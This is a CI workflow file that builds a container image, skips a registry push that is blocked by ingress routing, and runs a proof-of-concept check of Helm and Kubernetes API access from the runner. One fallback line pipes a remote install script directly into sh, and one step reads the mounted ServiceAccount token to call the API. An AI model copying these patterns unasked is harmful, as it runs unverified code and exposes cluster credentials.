name: Build and Push Container Image on: push: branches: - main tags: - "v*" jobs: build-and-push: runs-on: orchestration-platform container: image: docker:latest steps: - name: Install tools run: | apk add --no-cache git curl - name: Checkout code run: | git clone --branch "${GITHUB_REF_NAME}" "${GITHUB_SERVER_URL}/${GITHUB_REPOSITORY}.git" . - name: Determine image tag id: meta run: | if echo "${{ gitea.ref }}" | grep -q "refs/tags/"; then TAG=$(echo "${{ gitea.ref }}" | sed 's|refs/tags/||') else TAG="latest" fi echo "tag=${TAG}" >> "$GITHUB_OUTPUT" - name: Build image run: | REGISTRY_HOST=$(echo "${{ gitea.server_url }}" | sed 's|https\?://||') IMAGE="${REGISTRY_HOST}/${{ gitea.repository }}:${{ steps.meta.outputs.tag }}" docker build -t "${IMAGE}" . echo "image=${IMAGE}" >> "$GITHUB_OUTPUT" id: build # TODO: Registry push is currently blocked. # The Gitea ingress only routes /gitea/ to the backend; the Docker registry # API (/v2/) returns 404 from nginx. A separate Ingress rule for /v2 -> gitea-http:3000 # (without rewrite-target) is needed before push can work. - name: Push image (skipped - registry ingress not configured) run: | REGISTRY_HOST=$(echo "${{ gitea.server_url }}" | sed 's|https\?://||') IMAGE="${REGISTRY_HOST}/${{ gitea.repository }}:${{ steps.meta.outputs.tag }}" echo "⚠️ Skipping push: Gitea container registry is not reachable." echo " The ingress does not route /v2/ to Gitea (returns 404 from nginx)." echo " Fix: Add a separate Ingress for path /v2 pointing to gitea-http:3000 without rewrite-target." echo "" echo " Image built successfully: ${IMAGE}" echo " To push manually once ingress is fixed:" echo " crane auth login \${REGISTRY_HOST} -u -p " echo " crane push image.tar \${IMAGE}" # PoC: Verify Helm + K8s API access from the CI runner - name: "PoC: Helm upgrade feasibility check" run: | echo "=== 1. Install Helm ===" apk add --no-cache helm || { # Fallback: install from official script if not in apk curl -fsSL https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | sh } helm version echo "" echo "=== 2. Check in-cluster credentials ===" SA_TOKEN_PATH="/var/run/secrets/kubernetes.io/serviceaccount" if [ -f "${SA_TOKEN_PATH}/token" ]; then echo "✅ ServiceAccount token found" echo " Namespace: $(cat ${SA_TOKEN_PATH}/namespace)" else echo "❌ No ServiceAccount token mounted — Helm cannot authenticate to the API server" exit 1 fi echo "" echo "=== 3. Test K8s API connectivity ===" KUBE_API="https://kubernetes.default.svc" TOKEN=$(cat ${SA_TOKEN_PATH}/token) CA_CERT="${SA_TOKEN_PATH}/ca.crt" HTTP_CODE=$(curl -s -o /dev/null -w "%{http_code}" \ --cacert "${CA_CERT}" \ -H "Authorization: Bearer ${TOKEN}" \ "${KUBE_API}/api/v1/namespaces/$(cat ${SA_TOKEN_PATH}/namespace)") echo " API response: HTTP ${HTTP_CODE}" if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "403" ]; then echo "✅ API server is reachable (${HTTP_CODE})" else echo "❌ API server not reachable (HTTP ${HTTP_CODE})" exit 1 fi echo "" echo "=== 4. Test Helm list (current namespace) ===" NAMESPACE=$(cat ${SA_TOKEN_PATH}/namespace) helm list --namespace "${NAMESPACE}" 2>&1 || echo "⚠️ helm list failed — likely RBAC issue" echo "" echo "=== 5. Dry-run Helm upgrade (no actual changes) ===" echo " Attempting dry-run with a dummy chart to verify permissions..." helm upgrade --install helm-poc-test oci://registry-1.docker.io/bitnamicharts/nginx \ --namespace "${NAMESPACE}" \ --dry-run \ --set replicaCount=0 2>&1 || echo "⚠️ Dry-run failed — check RBAC permissions for the runner ServiceAccount" echo "" echo "=== Summary ===" echo "If steps 1-4 passed, Helm upgrade from CI is technically feasible." echo "RBAC may need to be extended for the runner ServiceAccount to allow:" echo " - get/list/create/update Deployments, Services, ConfigMaps, Secrets" echo " - in the target namespace for user deployments"